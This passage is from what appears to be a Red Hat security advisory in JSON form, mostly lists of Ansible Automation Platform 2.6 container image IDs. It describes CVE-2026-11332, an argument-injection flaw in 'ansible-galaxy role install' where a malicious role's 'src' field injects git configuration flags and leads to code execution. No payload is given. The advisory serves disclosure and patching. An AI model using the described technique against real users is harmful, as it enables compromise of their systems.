"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "webpack-dev-server: webpack-dev-server: Information disclosure and denial of service via improper proxy configuration"
},
{
"acknowledgments": [
{
"names": [
"Tommaso Bona"
]
}
],
"cve": "CVE-2026-11332",
"cwe": {
"id": "CWE-88",
"name": "Improper Neutralization of Argument Delimiters in a Command (\u0027Argument Injection\u0027)"
},
"discovery_date": "2026-04-14T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2485379"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in ansible-core. The ansible-galaxy role install command processes dependency specifications from a role\u0027s meta/requirements.yml file. Due to improper neutralization of argument delimiters, a malicious role author can inject arbitrary git configuration flags through the src field. This allows arbitrary code execution on the machine of a user who installs the role via ansible-galaxy role install.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "ansible-core: argument injection in ansible-galaxy role install leads to arbitrary code execution",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Conditions for Exploitation: Successful exploitation requires user interaction, specifically tricking a victim into installing a maliciously crafted Ansible role (or a role with a malicious dependency) using the ansible-galaxy role install command.\n\nBroad Impact: While user interaction is required, the potential impact is highly severe. Successfully injecting the malicious arguments allows a remote attacker to achieve arbitrary code execution on the machine running the Ansible command, leading to a full compromise of the user\u0027s environment and system integrity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
